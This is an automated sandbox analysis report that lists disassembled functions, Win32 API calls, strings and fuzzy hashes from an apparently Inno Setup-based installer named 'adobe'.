                                                                                                                                                          • API ID: Window$Long$Show
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3609083571-0
                                                                                                                                                          • Opcode ID: 0e1e82f1a2b2afdabfbcb584766f4e7fe8091c7b60e66c59938f8a58561eb338
                                                                                                                                                          • Instruction ID: 53f4afee34405168921573d6abf47edcf93367c04ab8e422678ad5c4be4c5700
                                                                                                                                                          • Opcode Fuzzy Hash: 0e1e82f1a2b2afdabfbcb584766f4e7fe8091c7b60e66c59938f8a58561eb338
                                                                                                                                                          • Instruction Fuzzy Hash: B4015EB2645310ABD700D768CD81F263798AB0D338F09066AF999DF3E2C639DC509B4D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3527656728-0
                                                                                                                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                          • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00496424 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000,00496689,?,?,00000000), ref: 0049645A
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                            • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,00496482,00000000,00496655,?,?,00000005,00000000,00496689,?,?,00000000), ref: 004072BB
                                                                                                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                          • API String ID: 3312786188-1660910688
                                                                                                                                                          • Opcode ID: 45d0fffb756c842cc04f356fea3d3ca34f47a2459db53bf7563bf5126fa4148f
                                                                                                                                                          • Instruction ID: 62c63900fa16ef0985a3414d27717776778dc10f526a4304b6ec2729ed654e37
                                                                                                                                                          • Opcode Fuzzy Hash: 45d0fffb756c842cc04f356fea3d3ca34f47a2459db53bf7563bf5126fa4148f
                                                                                                                                                          • Instruction Fuzzy Hash: 83319274A006149FCB00FF65DD5295E7BB5EB49308B52887AF400AB7A6CB38AD04DB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004968D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496948
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496971
                                                                                                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049698A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$Attributes$Move
                                                                                                                                                          • String ID: (rI$isRS-%.3u.tmp
                                                                                                                                                          • API String ID: 3839737484-3836573314
                                                                                                                                                          • Opcode ID: 330efe311aea8f791b90aa19e7541f93584cb7a20b0989d846857099f7fb8e83
                                                                                                                                                          • Instruction ID: a7fff72c20bdfc84bde37009071cf3b2714fa55b1c9600803885d9d98029213d
                                                                                                                                                          • Opcode Fuzzy Hash: 330efe311aea8f791b90aa19e7541f93584cb7a20b0989d846857099f7fb8e83
                                                                                                                                                          • Instruction Fuzzy Hash: AA2167B1E00219AFCF01EFA9C981AAFBBF8EB44314F51453BB414F72D1D6385E018A59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E91C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                                                          • API String ID: 828529508-2866557904
                                                                                                                                                          • Opcode ID: 0df27dc886b1d3e581021cb75878fe42988ead3057155673be0c8b1580814d82
                                                                                                                                                          • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                                                                                                          • Opcode Fuzzy Hash: 0df27dc886b1d3e581021cb75878fe42988ead3057155673be0c8b1580814d82
                                                                                                                                                          • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004572F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457320
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,00496E0E), ref: 00457341
                                                                                                                                                          • CloseHandle.KERNEL32(?,00457374,?,?,00457B8F,00000000,00000000), ref: 00457367
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                                                          • API String ID: 2573145106-3235461205
                                                                                                                                                          • Opcode ID: 6eefd9f50476b9317959784dc28f8f231be967919d8c48666081bcd3cabceedf
                                                                                                                                                          • Instruction ID: 4a074e93e4ab88470b46d36102555543fa5a99f4012040e6d914a5d3a66b8e8b
                                                                                                                                                          • Opcode Fuzzy Hash: 6eefd9f50476b9317959784dc28f8f231be967919d8c48666081bcd3cabceedf
                                                                                                                                                          • Instruction Fuzzy Hash: B401A230608204AFDB11EF999D42E5E73E8EB49724F2041B7BC10D73D2D67CAD04E658
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004534C2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534CF
                                                                                                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 004534F4
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                                                          • String ID: (rI$DeleteFile$MoveFile
                                                                                                                                                          • API String ID: 3024442154-2098259748
                                                                                                                                                          • Opcode ID: 5d0c1779b8e16b3ae36e0bebb0f41303659532bd6b8dc4fd8825605b63ba4c8e
                                                                                                                                                          • Instruction ID: 70eb457cff55a4d5f9d98fb722c0821592184d165c2451b26ab6992e5a9cd8f1
                                                                                                                                                          • Opcode Fuzzy Hash: 5d0c1779b8e16b3ae36e0bebb0f41303659532bd6b8dc4fd8825605b63ba4c8e
                                                                                                                                                          • Instruction Fuzzy Hash: 32F086706041046AEB01FFA5D95266E67ECDB4434BFA0443BF800B76C3DA3C9E09893D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E820 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                                                                                          • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                                          • API String ID: 3478007392-2498399450
                                                                                                                                                          • Opcode ID: cdc7b060e8b26ef6bba2eda7f6a702c2b70b9cef93cd34ce0534829a320e8a46
                                                                                                                                                          • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                                                                                                          • Opcode Fuzzy Hash: cdc7b060e8b26ef6bba2eda7f6a702c2b70b9cef93cd34ce0534829a320e8a46
                                                                                                                                                          • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004767B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 004767B8
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004768AF,0049B050,00000000), ref: 004767CB
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                                          • API String ID: 1782028327-3855017861
                                                                                                                                                          • Opcode ID: 253f29cc5d34b4f0098bf6cec3cd54211177093b5d28b857057e13c9eed5381f
                                                                                                                                                          • Instruction ID: 6e27a2cfa281462b526e1be0b42828d7d17b2ea8f6af052b61cc0337a2e5f352
                                                                                                                                                          • Opcode Fuzzy Hash: 253f29cc5d34b4f0098bf6cec3cd54211177093b5d28b857057e13c9eed5381f
                                                                                                                                                          • Instruction Fuzzy Hash: BBD0A7B0201B0066DD1473F14D87D9B634ECD84799711883B7418E2186CA3CE808497D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044EF98 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: NotifyWinEvent$dD$user32.dll
                                                                                                                                                          • API String ID: 1646373207-754903266
                                                                                                                                                          • Opcode ID: da7dd1d7eeb1acca88fabe30517a1b31fd1e0b0306d4e26cdddca2e5d0ffe6ec
                                                                                                                                                          • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                                                                                          • Opcode Fuzzy Hash: da7dd1d7eeb1acca88fabe30517a1b31fd1e0b0306d4e26cdddca2e5d0ffe6ec
                                                                                                                                                          • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                                                                          • SaveDC.GDI32(?), ref: 00416C93
                                                                                                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                                                                          • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3808407030-0
                                                                                                                                                          • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                          • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                                                                          • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                          • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                          • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                                                                          • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                          • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                          • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                                                                          • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                                                                          • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                                                                          • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
